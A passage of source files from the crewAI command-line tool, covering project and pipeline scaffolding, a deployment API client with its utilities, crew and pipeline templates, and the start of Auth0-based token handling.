name.replace("_", " ").replace("-", " ").title().replace(" ", "") click.secho(f"Creating pipeline {folder_name}...", fg="green", bold=True) project_root = Path(folder_name) if project_root.exists(): click.secho(f"Error: Folder {folder_name} already exists.", fg="red") return # Create directory structure (project_root / "src" / folder_name).mkdir(parents=True) (project_root / "src" / folder_name / "pipelines").mkdir(parents=True) (project_root / "src" / folder_name / "crews").mkdir(parents=True) (project_root / "src" / folder_name / "tools").mkdir(parents=True) (project_root / "tests").mkdir(exist_ok=True) # Create .env file with open(project_root / ".env", "w") as file: file.write("OPENAI_API_KEY=YOUR_API_KEY") package_dir = Path(__file__).parent template_folder = "pipeline_router" if router else "pipeline" templates_dir = package_dir / "templates" / template_folder # List of template files to copy root_template_files = [".gitignore", "pyproject.toml", "README.md"] src_template_files = ["__init__.py", "main.py"] tools_template_files = ["tools/__init__.py", "tools/custom_tool.py"] if router: crew_folders = [ "classifier_crew", "normal_crew", "urgent_crew", ] pipelines_folders = [ "pipelines/__init__.py", "pipelines/pipeline_classifier.py", "pipelines/pipeline_normal.py", "pipelines/pipeline_urgent.py", ] else: crew_folders = [ "research_crew", "write_linkedin_crew", "write_x_crew", ] pipelines_folders = ["pipelines/__init__.py", "pipelines/pipeline.py"] def process_file(src_file, dst_file): with open(src_file, "r") as file: content = file.read() content = content.replace("{{name}}", name) content = content.replace("{{crew_name}}", class_name) content = content.replace("{{folder_name}}", folder_name) content = content.replace("{{pipeline_name}}", class_name) with open(dst_file, "w") as file: file.write(content) # Copy and process root template files for file_name in root_template_files: src_file = templates_dir / file_name dst_file = project_root / file_name process_file(src_file, dst_file) # Copy and process src template files for file_name in src_template_files: src_file = templates_dir / file_name dst_file = project_root / "src" / folder_name / file_name process_file(src_file, dst_file) # Copy tools files for file_name in tools_template_files: src_file = templates_dir / file_name dst_file = project_root / "src" / folder_name / file_name shutil.copy(src_file, dst_file) # Copy pipelines folders for file_name in pipelines_folders: src_file = templates_dir / file_name dst_file = project_root / "src" / folder_name / file_name process_file(src_file, dst_file) # Copy crew folders for crew_folder in crew_folders: src_crew_folder = templates_dir / "crews" / crew_folder dst_crew_folder = project_root / "src" / folder_name / "crews" / crew_folder if src_crew_folder.exists(): shutil.copytree(src_crew_folder, dst_crew_folder) else: click.secho( f"Warning: Crew folder {crew_folder} not found in template.", fg="yellow", ) click.secho(f"Pipeline {name} created successfully!", fg="green", bold=True) File: src/crewai/cli/deploy/__init__.py File: src/crewai/cli/deploy/api.py from os import getenv import requests from crewai.cli.deploy.utils import get_crewai_version class CrewAPI: """ CrewAPI class to interact with the crewAI+ API. """ def __init__(self, api_key: str) -> None: self.api_key = api_key self.headers = { "Authorization": f"Bearer {api_key}", "Content-Type": "application/json", "User-Agent": f"CrewAI-CLI/{get_crewai_version()}", } self.base_url = getenv( "CREWAI_BASE_URL", "https://crewai.com/crewai_plus/api/v1/crews" ) def _make_request(self, method: str, endpoint: str, **kwargs) -> requests.Response: url = f"{self.base_url}/{endpoint}" return requests.request(method, url, headers=self.headers, **kwargs) # Deploy def deploy_by_name(self, project_name: str) -> requests.Response: return self._make_request("POST", f"by-name/{project_name}/deploy") def deploy_by_uuid(self, uuid: str) -> requests.Response: return self._make_request("POST", f"{uuid}/deploy") # Status def status_by_name(self, project_name: str) -> requests.Response: return self._make_request("GET", f"by-name/{project_name}/status") def status_by_uuid(self, uuid: str) -> requests.Response: return self._make_request("GET", f"{uuid}/status") # Logs def logs_by_name( self, project_name: str, log_type: str = "deployment" ) -> requests.Response: return self._make_request("GET", f"by-name/{project_name}/logs/{log_type}") def logs_by_uuid( self, uuid: str, log_type: str = "deployment" ) -> requests.Response: return self._make_request("GET", f"{uuid}/logs/{log_type}") # Delete def delete_by_name(self, project_name: str) -> requests.Response: return self._make_request("DELETE", f"by-name/{project_name}") def delete_by_uuid(self, uuid: str) -> requests.Response: return self._make_request("DELETE", f"{uuid}") # List def list_crews(self) -> requests.Response: return self._make_request("GET", "") # Create def create_crew(self, payload) -> requests.Response: return self._make_request("POST", "", json=payload) File: src/crewai/cli/deploy/utils.py import sys import re import subprocess from rich.console import Console from ..authentication.utils import TokenManager console = Console() if sys.version_info >= (3, 11): import tomllib # Drop the simple_toml_parser when we move to python3.11 def simple_toml_parser(content): result = {} current_section = result for line in content.split('\n'): line = line.strip() if line.startswith('[') and line.endswith(']'): # New section section = line[1:-1].split('.') current_section = result for key in section: current_section = current_section.setdefault(key, {}) elif '=' in line: key, value = line.split('=', 1) key = key.strip() value = value.strip().strip('"') current_section[key] = value return result def parse_toml(content): if sys.version_info >= (3, 11): return tomllib.loads(content) else: return simple_toml_parser(content) def get_git_remote_url() -> str | None: """Get the Git repository's remote URL.""" try: # Run the git remote -v command result = subprocess.run( ["git", "remote", "-v"], capture_output=True, text=True, check=True ) # Get the output output = result.stdout # Parse the output to find the origin URL matches = re.findall(r"origin\s+(.*?)\s+\(fetch\)", output) if matches: return matches[0] # Return the first match (origin URL) else: console.print("No origin remote found.", style="bold red") except subprocess.CalledProcessError as e: console.print(f"Error running trying to fetch the Git Repository: {e}", style="bold red") except FileNotFoundError: console.print("Git command not found. Make sure Git is installed and in your PATH.", style="bold red") return None def get_project_name(pyproject_path: str = "pyproject.toml") -> str | None: """Get the project name from the pyproject.toml file.""" try: # Read the pyproject.toml file with open(pyproject_path, "r") as f: pyproject_content = parse_toml(f.read()) # Extract the project name project_name = pyproject_content["tool"]["poetry"]["name"] if "crewai" not in pyproject_content["tool"]["poetry"]["dependencies"]: raise Exception("crewai is not in the dependencies.") return project_name except FileNotFoundError: print(f"Error: {pyproject_path} not found.") except KeyError: print(f"Error: {pyproject_path} is not a valid pyproject.toml file.") except tomllib.TOMLDecodeError if sys.version_info >= (3, 11) else Exception as e: # type: ignore print( f"Error: {pyproject_path} is not a valid TOML file." if sys.version_info >= (3, 11) else f"Error reading the pyproject.toml file: {e}" ) except Exception as e: print(f"Error reading the pyproject.toml file: {e}") return None def get_crewai_version(poetry_lock_path: str = "poetry.lock") -> str: """Get the version number of crewai from the poetry.lock file.""" try: with open(poetry_lock_path, "r") as f: lock_content = f.read() match = re.search( r'\[\[package\]\]\s*name\s*=\s*"crewai"\s*version\s*=\s*"([^"]+)"', lock_content, re.DOTALL, ) if match: return match.group(1) else: print("crewai package not found in poetry.lock") return "no-version-found" except FileNotFoundError: print(f"Error: {poetry_lock_path} not found.") except Exception as e: print(f"Error reading the poetry.lock file: {e}") return "no-version-found" def fetch_and_json_env_file(env_file_path: str = ".env") -> dict: """Fetch the environment variables from a .env file and return them as a dictionary.""" try: # Read the .env file with open(env_file_path, "r") as f: env_content = f.read() # Parse the .env file content to a dictionary env_dict = {} for line in env_content.splitlines(): if line.strip() and not line.strip().startswith("#"): key, value = line.split("=", 1) env_dict[key.strip()] = value.strip() return env_dict except FileNotFoundError: print(f"Error: {env_file_path} not found.") except Exception as e: print(f"Error reading the .env file: {e}") return {} def get_auth_token() -> str: """Get the authentication token.""" access_token = TokenManager().get_token() if not access_token: raise Exception() return access_token File: src/crewai/cli/deploy/main.py from typing import Any, Dict, List, Optional from rich.console import Console from crewai.telemetry import Telemetry from .api import CrewAPI from .utils import ( fetch_and_json_env_file, get_auth_token, get_git_remote_url, get_project_name, ) console = Console() class DeployCommand: """ A class to handle deployment-related operations for CrewAI projects. """ def __init__(self): """ Initialize the DeployCommand with project name and API client. """ try: self._telemetry = Telemetry() self._telemetry.set_tracer() access_token = get_auth_token() except Exception: self._deploy_signup_error_span = self._telemetry.deploy_signup_error_span() console.print( "Please sign up/login to CrewAI+ before using the CLI.", style="bold red", ) console.print("Run 'crewai signup' to sign up/login.", style="bold green") raise SystemExit self.project_name = get_project_name() if self.project_name is None: console.print( "No project name found. Please ensure your project has a valid pyproject.toml file.", style="bold red", ) raise SystemExit self.client = CrewAPI(api_key=access_token) def _handle_error(self, json_response: Dict[str, Any]) -> None: """ Handle and display error messages from API responses. Args: json_response (Dict[str, Any]): The JSON response containing error information. """ error = json_response.get("error", "Unknown error") message = json_response.get("message", "No message provided") console.print(f"Error: {error}", style="bold red") console.print(f"Message: {message}", style="bold red") def _standard_no_param_error_message(self) -> None: """ Display a standard error message when no UUID or project name is available. """ console.print( "No UUID provided, project pyproject.toml not found or with error.", style="bold red", ) def _display_deployment_info(self, json_response: Dict[str, Any]) -> None: """ Display deployment information. Args: json_response (Dict[str, Any]): The deployment information to display. """ console.print("Deploying the crew...\n", style="bold blue") for key, value in json_response.items(): console.print(f"{key.title()}: [green]{value}[/green]") console.print("\nTo check the status of the deployment, run:") console.print("crewai deploy status") console.print(" or") console.print(f"crewai deploy status --uuid \"{json_response['uuid']}\"") def _display_logs(self, log_messages: List[Dict[str, Any]]) -> None: """ Display log messages. Args: log_messages (List[Dict[str, Any]]): The log messages to display. """ for log_message in log_messages: console.print( f"{log_message['timestamp']} - {log_message['level']}: {log_message['message']}" ) def deploy(self, uuid: Optional[str] = None) -> None: """ Deploy a crew using either UUID or project name. Args: uuid (Optional[str]): The UUID of the crew to deploy. """ self._start_deployment_span = self._telemetry.start_deployment_span(uuid) console.print("Starting deployment...", style="bold blue") if uuid: response = self.client.deploy_by_uuid(uuid) elif self.project_name: response = self.client.deploy_by_name(self.project_name) else: self._standard_no_param_error_message() return json_response = response.json() if response.status_code == 200: self._display_deployment_info(json_response) else: self._handle_error(json_response) def create_crew(self, confirm: bool) -> None: """ Create a new crew deployment. """ self._create_crew_deployment_span = ( self._telemetry.create_crew_deployment_span() ) console.print("Creating deployment...", style="bold blue") env_vars = fetch_and_json_env_file() remote_repo_url = get_git_remote_url() if remote_repo_url is None: console.print("No remote repository URL found.", style="bold red") console.print( "Please ensure your project has a valid remote repository.", style="yellow", ) return self._confirm_input(env_vars, remote_repo_url, confirm) payload = self._create_payload(env_vars, remote_repo_url) response = self.client.create_crew(payload) if response.status_code == 201: self._display_creation_success(response.json()) else: self._handle_error(response.json()) def _confirm_input( self, env_vars: Dict[str, str], remote_repo_url: str, confirm: bool ) -> None: """ Confirm input parameters with the user. Args: env_vars (Dict[str, str]): Environment variables. remote_repo_url (str): Remote repository URL. confirm (bool): Whether to confirm input. """ if not confirm: input(f"Press Enter to continue with the following Env vars: {env_vars}") input( f"Press Enter to continue with the following remote repository: {remote_repo_url}\n" ) def _create_payload( self, env_vars: Dict[str, str], remote_repo_url: str, ) -> Dict[str, Any]: """ Create the payload for crew creation. Args: remote_repo_url (str): Remote repository URL. env_vars (Dict[str, str]): Environment variables. Returns: Dict[str, Any]: The payload for crew creation. """ return { "deploy": { "name": self.project_name, "repo_clone_url": remote_repo_url, "env": env_vars, } } def _display_creation_success(self, json_response: Dict[str, Any]) -> None: """ Display success message after crew creation. Args: json_response (Dict[str, Any]): The response containing crew information. """ console.print("Deployment created successfully!\n", style="bold green") console.print( f"Name: {self.project_name} ({json_response['uuid']})", style="bold green" ) console.print(f"Status: {json_response['status']}", style="bold green") console.print("\nTo (re)deploy the crew, run:") console.print("crewai deploy push") console.print(" or") console.print(f"crewai deploy push --uuid {json_response['uuid']}") def list_crews(self) -> None: """ List all available crews. """ console.print("Listing all Crews\n", style="bold blue") response = self.client.list_crews() json_response = response.json() if response.status_code == 200: self._display_crews(json_response) else: self._display_no_crews_message() def _display_crews(self, crews_data: List[Dict[str, Any]]) -> None: """ Display the list of crews. Args: crews_data (List[Dict[str, Any]]): List of crew data to display. """ for crew_data in crews_data: console.print( f"- {crew_data['name']} ({crew_data['uuid']}) [blue]{crew_data['status']}[/blue]" ) def _display_no_crews_message(self) -> None: """ Display a message when no crews are available. """ console.print("You don't have any Crews yet. Let's create one!", style="yellow") console.print(" crewai create crew <crew_name>", style="green") def get_crew_status(self, uuid: Optional[str] = None) -> None: """ Get the status of a crew. Args: uuid (Optional[str]): The UUID of the crew to check. """ console.print("Fetching deployment status...", style="bold blue") if uuid: response = self.client.status_by_uuid(uuid) elif self.project_name: response = self.client.status_by_name(self.project_name) else: self._standard_no_param_error_message() return json_response = response.json() if response.status_code == 200: self._display_crew_status(json_response) else: self._handle_error(json_response) def _display_crew_status(self, status_data: Dict[str, str]) -> None: """ Display the status of a crew. Args: status_data (Dict[str, str]): The status data to display. """ console.print(f"Name:\t {status_data['name']}") console.print(f"Status:\t {status_data['status']}") def get_crew_logs(self, uuid: Optional[str], log_type: str = "deployment") -> None: """ Get logs for a crew. Args: uuid (Optional[str]): The UUID of the crew to get logs for. log_type (str): The type of logs to retrieve (default: "deployment"). """ self._get_crew_logs_span = self._telemetry.get_crew_logs_span(uuid, log_type) console.print(f"Fetching {log_type} logs...", style="bold blue") if uuid: response = self.client.logs_by_uuid(uuid, log_type) elif self.project_name: response = self.client.logs_by_name(self.project_name, log_type) else: self._standard_no_param_error_message() return if response.status_code == 200: self._display_logs(response.json()) else: self._handle_error(response.json()) def remove_crew(self, uuid: Optional[str]) -> None: """ Remove a crew deployment. Args: uuid (Optional[str]): The UUID of the crew to remove. """ self._remove_crew_span = self._telemetry.remove_crew_span(uuid) console.print("Removing deployment...", style="bold blue") if uuid: response = self.client.delete_by_uuid(uuid) elif self.project_name: response = self.client.delete_by_name(self.project_name) else: self._standard_no_param_error_message() return if response.status_code == 204: console.print( f"Crew '{self.project_name}' removed successfully.", style="green" ) else: console.print( f"Failed to remove crew '{self.project_name}'", style="bold red" ) File: src/crewai/cli/templates/__init__.py File: src/crewai/cli/templates/pipeline/__init__.py File: src/crewai/cli/templates/pipeline/main.py #!/usr/bin/env python import asyncio from {{folder_name}}.pipelines.pipeline import {{pipeline_name}}Pipeline async def run(): """ Run the pipeline. """ inputs = [ {"topic": "AI wearables"}, ] pipeline = {{pipeline_name}}Pipeline() results = await pipeline.kickoff(inputs) # Process and print results for result in results: print(f"Raw output: {result.raw}") if result.json_dict: print(f"JSON output: {result.json_dict}") print("\n") def main(): asyncio.run(run()) if __name__ == "__main__": main() File: src/crewai/cli/templates/pipeline/crews/research_crew/research_crew.py from pydantic import BaseModel from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool class ResearchReport(BaseModel): """Research Report""" title: str body: str @CrewBase class ResearchCrew(): """Research Crew""" agents_config = 'config/agents.yaml' tasks_config = 'config/tasks.yaml' @agent def researcher(self) -> Agent: return Agent( config=self.agents_config['researcher'], verbose=True ) @agent def reporting_analyst(self) -> Agent: return Agent( config=self.agents_config['reporting_analyst'], verbose=True ) @task def research_task(self) -> Task: return Task( config=self.tasks_config['research_task'], ) @task def reporting_task(self) -> Task: return Task( config=self.tasks_config['reporting_task'], output_pydantic=ResearchReport ) @crew def crew(self) -> Crew: """Creates the Research Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline/crews/write_linkedin_crew/write_linkedin_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from {{folder_name}}.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class WriteLinkedInCrew(): """Research Crew""" agents_config = 'config/agents.yaml' tasks_config = 'config/tasks.yaml' @agent def researcher(self) -> Agent: return Agent( config=self.agents_config['researcher'], verbose=True ) @agent def reporting_analyst(self) -> Agent: return Agent( config=self.agents_config['reporting_analyst'], verbose=True ) @task def research_task(self) -> Task: return Task( config=self.tasks_config['research_task'], ) @task def reporting_task(self) -> Task: return Task( config=self.tasks_config['reporting_task'], output_file='report.md' ) @crew def crew(self) -> Crew: """Creates the {{crew_name}} crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline/crews/write_x_crew/write_x_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class WriteXCrew: """Research Crew""" agents_config = "config/agents.yaml" tasks_config = "config/tasks.yaml" @agent def x_writer_agent(self) -> Agent: return Agent(config=self.agents_config["x_writer_agent"], verbose=True) @task def write_x_task(self) -> Task: return Task( config=self.tasks_config["write_x_task"], ) @crew def crew(self) -> Crew: """Creates the Write X Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline/tools/__init__.py File: src/crewai/cli/templates/pipeline/tools/custom_tool.py from crewai_tools import BaseTool class MyCustomTool(BaseTool): name: str = "Name of my tool" description: str = ( "Clear description for what this tool is useful for, you agent will need this information to use it." ) def _run(self, argument: str) -> str: # Implementation goes here return "this is an example of a tool output, ignore it and move along." File: src/crewai/cli/templates/pipeline/pipelines/__init__.py File: src/crewai/cli/templates/pipeline/pipelines/pipeline.py """ This pipeline file includes two different examples to demonstrate the flexibility of crewAI pipelines. Example 1: Two-Stage Pipeline ----------------------------- This pipeline consists of two crews: 1. ResearchCrew: Performs research on a given topic. 2. WriteXCrew: Generates an X (Twitter) post based on the research findings. Key features: - The ResearchCrew's final task uses output_json to store all research findings in a JSON object. - This JSON object is then passed to the WriteXCrew, where tasks can access the research findings. Example 2: Two-Stage Pipeline with Parallel Execution ------------------------------------------------------- This pipeline consists of three crews: 1. ResearchCrew: Performs research on a given topic. 2. WriteXCrew and WriteLinkedInCrew: Run in parallel, using the research findings to generate posts for X and LinkedIn, respectively. Key features: - Demonstrates the ability to run multiple crews in parallel. - Shows how to structure a pipeline with both sequential and parallel stages. Usage: - To switch between examples, comment/uncomment the respective code blocks below. - Ensure that you have implemented all necessary crew classes (ResearchCrew, WriteXCrew, WriteLinkedInCrew) before running. """ # Common imports for both examples from crewai import Pipeline # Uncomment the crews you need for your chosen example from ..crews.research_crew.research_crew import ResearchCrew from ..crews.write_x_crew.write_x_crew import WriteXCrew # from .crews.write_linkedin_crew.write_linkedin_crew import WriteLinkedInCrew # Uncomment for Example 2 # EXAMPLE 1: Two-Stage Pipeline # ----------------------------- # Uncomment the following code block to use Example 1 class {{pipeline_name}}Pipeline: def __init__(self): # Initialize crews self.research_crew = ResearchCrew().crew() self.write_x_crew = WriteXCrew().crew() def create_pipeline(self): return Pipeline( stages=[ self.research_crew, self.write_x_crew ] ) async def kickoff(self, inputs): pipeline = self.create_pipeline() results = await pipeline.kickoff(inputs) return results # EXAMPLE 2: Two-Stage Pipeline with Parallel Execution # ------------------------------------------------------- # Uncomment the following code block to use Example 2 # @PipelineBase # class {{pipeline_name}}Pipeline: # def __init__(self): # # Initialize crews # self.research_crew = ResearchCrew().crew() # self.write_x_crew = WriteXCrew().crew() # self.write_linkedin_crew = WriteLinkedInCrew().crew() # @pipeline # def create_pipeline(self): # return Pipeline( # stages=[ # self.research_crew, # [self.write_x_crew, self.write_linkedin_crew] # Parallel execution # ] # ) # async def run(self, inputs): # pipeline = self.create_pipeline() # results = await pipeline.kickoff(inputs) # return results File: src/crewai/cli/templates/pipeline_router/__init__.py File: src/crewai/cli/templates/pipeline_router/main.py #!/usr/bin/env python import asyncio from crewai.routers.router import Route from crewai.routers.router import Router from {{folder_name}}.pipelines.pipeline_classifier import EmailClassifierPipeline from {{folder_name}}.pipelines.pipeline_normal import NormalPipeline from {{folder_name}}.pipelines.pipeline_urgent import UrgentPipeline async def run(): """ Run the pipeline. """ inputs = [ { "email": """ Subject: URGENT: Marketing Campaign Launch - Immediate Action Required Dear Team, I'm reaching out regarding our upcoming marketing campaign that requires your immediate attention and swift action. We're facing a critical deadline, and our success hinges on our ability to mobilize quickly. Key points: Campaign launch: 48 hours from now Target audience: 250,000 potential customers Expected ROI: 35% increase in Q3 sales What we need from you NOW: Final approval on creative assets (due in 3 hours) Confirmation of media placements (due by end of day) Last-minute budget allocation for paid social media push Our competitors are poised to launch similar campaigns, and we must act fast to maintain our market advantage. Delays could result in significant lost opportunities and potential revenue. Please prioritize this campaign above all other tasks. I'll be available for the next 24 hours to address any concerns or roadblocks. Let's make this happen! [Your Name] Marketing Director P.S. I'll be scheduling an emergency team meeting in 1 hour to discuss our action plan. Attendance is mandatory. """ } ] pipeline_classifier = EmailClassifierPipeline().create_pipeline() pipeline_urgent = UrgentPipeline().create_pipeline() pipeline_normal = NormalPipeline().create_pipeline() router = Router( routes={ "high_urgency": Route( condition=lambda x: x.get("urgency_score", 0) > 7, pipeline=pipeline_urgent ), "low_urgency": Route( condition=lambda x: x.get("urgency_score", 0) <= 7, pipeline=pipeline_normal ) }, default=pipeline_normal ) pipeline = pipeline_classifier >> router results = await pipeline.kickoff(inputs) # Process and print results for result in results: print(f"Raw output: {result.raw}") if result.json_dict: print(f"JSON output: {result.json_dict}") print("\n") def main(): asyncio.run(run()) if __name__ == "__main__": main() File: src/crewai/cli/templates/pipeline_router/crews/urgent_crew/urgent_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class UrgentCrew: """Urgent Email Crew""" agents_config = "config/agents.yaml" tasks_config = "config/tasks.yaml" @agent def urgent_handler(self) -> Agent: return Agent(config=self.agents_config["urgent_handler"], verbose=True) @task def urgent_task(self) -> Task: return Task( config=self.tasks_config["urgent_task"], ) @crew def crew(self) -> Crew: """Creates the Urgent Email Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline_router/crews/classifier_crew/classifier_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task from pydantic import BaseModel # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool class UrgencyScore(BaseModel): urgency_score: int @CrewBase class ClassifierCrew: """Email Classifier Crew""" agents_config = "config/agents.yaml" tasks_config = "config/tasks.yaml" @agent def classifier(self) -> Agent: return Agent(config=self.agents_config["classifier"], verbose=True) @task def urgent_task(self) -> Task: return Task( config=self.tasks_config["classify_email"], output_pydantic=UrgencyScore, ) @crew def crew(self) -> Crew: """Creates the Email Classifier Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline_router/crews/normal_crew/normal_crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from demo_pipeline.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class NormalCrew: """Normal Email Crew""" agents_config = "config/agents.yaml" tasks_config = "config/tasks.yaml" @agent def normal_handler(self) -> Agent: return Agent(config=self.agents_config["normal_handler"], verbose=True) @task def urgent_task(self) -> Task: return Task( config=self.tasks_config["normal_task"], ) @crew def crew(self) -> Crew: """Creates the Normal Email Crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, ) File: src/crewai/cli/templates/pipeline_router/tools/__init__.py File: src/crewai/cli/templates/pipeline_router/tools/custom_tool.py from crewai_tools import BaseTool class MyCustomTool(BaseTool): name: str = "Name of my tool" description: str = ( "Clear description for what this tool is useful for, you agent will need this information to use it." ) def _run(self, argument: str) -> str: # Implementation goes here return "this is an example of a tool output, ignore it and move along." File: src/crewai/cli/templates/pipeline_router/pipelines/pipeline_classifier.py from crewai import Pipeline from crewai.project import PipelineBase from ..crews.classifier_crew.classifier_crew import ClassifierCrew @PipelineBase class EmailClassifierPipeline: def __init__(self): # Initialize crews self.classifier_crew = ClassifierCrew().crew() def create_pipeline(self): return Pipeline( stages=[ self.classifier_crew ] ) async def kickoff(self, inputs): pipeline = self.create_pipeline() results = await pipeline.kickoff(inputs) return results File: src/crewai/cli/templates/pipeline_router/pipelines/pipeline_urgent.py from crewai import Pipeline from crewai.project import PipelineBase from ..crews.urgent_crew.urgent_crew import UrgentCrew @PipelineBase class UrgentPipeline: def __init__(self): # Initialize crews self.urgent_crew = UrgentCrew().crew() def create_pipeline(self): return Pipeline( stages=[ self.urgent_crew ] ) async def kickoff(self, inputs): pipeline = self.create_pipeline() results = await pipeline.kickoff(inputs) return results File: src/crewai/cli/templates/pipeline_router/pipelines/__init__.py File: src/crewai/cli/templates/pipeline_router/pipelines/pipeline_normal.py from crewai import Pipeline from crewai.project import PipelineBase from ..crews.normal_crew.normal_crew import NormalCrew @PipelineBase class NormalPipeline: def __init__(self): # Initialize crews self.normal_crew = NormalCrew().crew() def create_pipeline(self): return Pipeline( stages=[ self.normal_crew ] ) async def kickoff(self, inputs): pipeline = self.create_pipeline() results = await pipeline.kickoff(inputs) return results File: src/crewai/cli/templates/crew/__init__.py File: src/crewai/cli/templates/crew/crew.py from crewai import Agent, Crew, Process, Task from crewai.project import CrewBase, agent, crew, task # Uncomment the following line to use an example of a custom tool # from {{folder_name}}.tools.custom_tool import MyCustomTool # Check our tools documentations for more information on how to use them # from crewai_tools import SerperDevTool @CrewBase class {{crew_name}}Crew(): """{{crew_name}} crew""" agents_config = 'config/agents.yaml' tasks_config = 'config/tasks.yaml' @agent def researcher(self) -> Agent: return Agent( config=self.agents_config['researcher'], # tools=[MyCustomTool()], # Example of custom tool, loaded on the beginning of file verbose=True ) @agent def reporting_analyst(self) -> Agent: return Agent( config=self.agents_config['reporting_analyst'], verbose=True ) @task def research_task(self) -> Task: return Task( config=self.tasks_config['research_task'], ) @task def reporting_task(self) -> Task: return Task( config=self.tasks_config['reporting_task'], output_file='report.md' ) @crew def crew(self) -> Crew: """Creates the {{crew_name}} crew""" return Crew( agents=self.agents, # Automatically created by the @agent decorator tasks=self.tasks, # Automatically created by the @task decorator process=Process.sequential, verbose=True, # process=Process.hierarchical, # In case you wanna use that instead https://docs.crewai.com/how-to/Hierarchical/ ) File: src/crewai/cli/templates/crew/main.py #!/usr/bin/env python import sys from {{folder_name}}.crew import {{crew_name}}Crew # This main file is intended to be a way for your to run your # crew locally, so refrain from adding necessary logic into this file. # Replace with inputs you want to test with, it will automatically # interpolate any tasks and agents information def run(): """ Run the crew. """ inputs = { 'topic': 'AI LLMs' } {{crew_name}}Crew().crew().kickoff(inputs=inputs) def train(): """ Train the crew for a given number of iterations. """ inputs = { "topic": "AI LLMs" } try: {{crew_name}}Crew().crew().train(n_iterations=int(sys.argv[1]), filename=sys.argv[2], inputs=inputs) except Exception as e: raise Exception(f"An error occurred while training the crew: {e}") def replay(): """ Replay the crew execution from a specific task. """ try: {{crew_name}}Crew().crew().replay(task_id=sys.argv[1]) except Exception as e: raise Exception(f"An error occurred while replaying the crew: {e}") def test(): """ Test the crew execution and returns the results. """ inputs = { "topic": "AI LLMs" } try: {{crew_name}}Crew().crew().test(n_iterations=int(sys.argv[1]), openai_model_name=sys.argv[2], inputs=inputs) except Exception as e: raise Exception(f"An error occurred while replaying the crew: {e}") File: src/crewai/cli/templates/crew/tools/__init__.py File: src/crewai/cli/templates/crew/tools/custom_tool.py from crewai_tools import BaseTool class MyCustomTool(BaseTool): name: str = "Name of my tool" description: str = ( "Clear description for what this tool is useful for, you agent will need this information to use it." ) def _run(self, argument: str) -> str: # Implementation goes here return "this is an example of a tool output, ignore it and move along." File: src/crewai/cli/authentication/constants.py ALGORITHMS = ["RS256"] AUTH0_DOMAIN = "crewai.us.auth0.com" AUTH0_CLIENT_ID = "DEVC5Fw6NlRoSzmDCcOhVq85EfLBjKa8" AUTH0_AUDIENCE = "https://crewai.us.auth0.com/api/v2/" File: src/crewai/cli/authentication/__init__.py from .main import AuthenticationCommand __all__ = ["AuthenticationCommand"] File: src/crewai/cli/authentication/utils.py import json import os import sys from datetime import datetime, timedelta from pathlib import Path from typing import Optional from auth0.authentication.token_verifier import ( AsymmetricSignatureVerifier, TokenVerifier, ) from cryptography.fernet import Fernet from .constants import AUTH0_CLIENT_ID, AUTH0_DOMAIN def validate_token(id_token: str) -> None: """ Verify the token and its precedence :param id_token: """ jwks_url = f"https://{AUTH0_DOMAIN}/.well-known/jwks.json" issuer = f"https://{AUTH0_DOMAIN}/" signature_verifier = AsymmetricSignatureVerifier(jwks_url) token_verifier = TokenVerifier( signature_verifier=signature_verifier, issuer=issuer, audience=AUTH0_CLIENT_ID ) token_verifier.verify(id_token) class TokenManager: def __init__(self, file_path: str = "tokens.enc") -> None: """ Initialize the TokenManager class. :param file_path: The file path to store the encrypted tokens. Default is "tokens.enc". """ self.file_path = file_path self.key = self._get_or_create_key() self.fernet = Fernet(self.key) def _get_or_create_key(self) -> bytes: """ Get or create the encryption key. :return: The encryption key. """ key_filename = "secret.key" key = self.read_secure_file(key_filename) if key is not None: return key new_key = Fernet.generate_key() self.save_secure_file(key_filename, new_key) return new_key def save_tokens(self, access_token: str, expires_in: int) -> None: """ Save the access token and its expiration time. :param access_token: The access token to save. :param expires_in: The expiration time of the access token in seconds. """ expiration_time = datetime.now() + timedelta(seconds=expires_in) data = { "access_token": access_token, "expiration": expiration_time.isoformat(), } encrypted_data = self.fernet.encrypt(json.dumps(data).encode()) self.save_secure_file(self.file_path, encrypted_data) def get_token(self) -> Optional[str]: """ Get the access token if it is valid and not expired. :return: The access token if valid and not expired, otherwise None. """ encrypted_data = self.read_secure_file(self.file_path) decrypted_data = 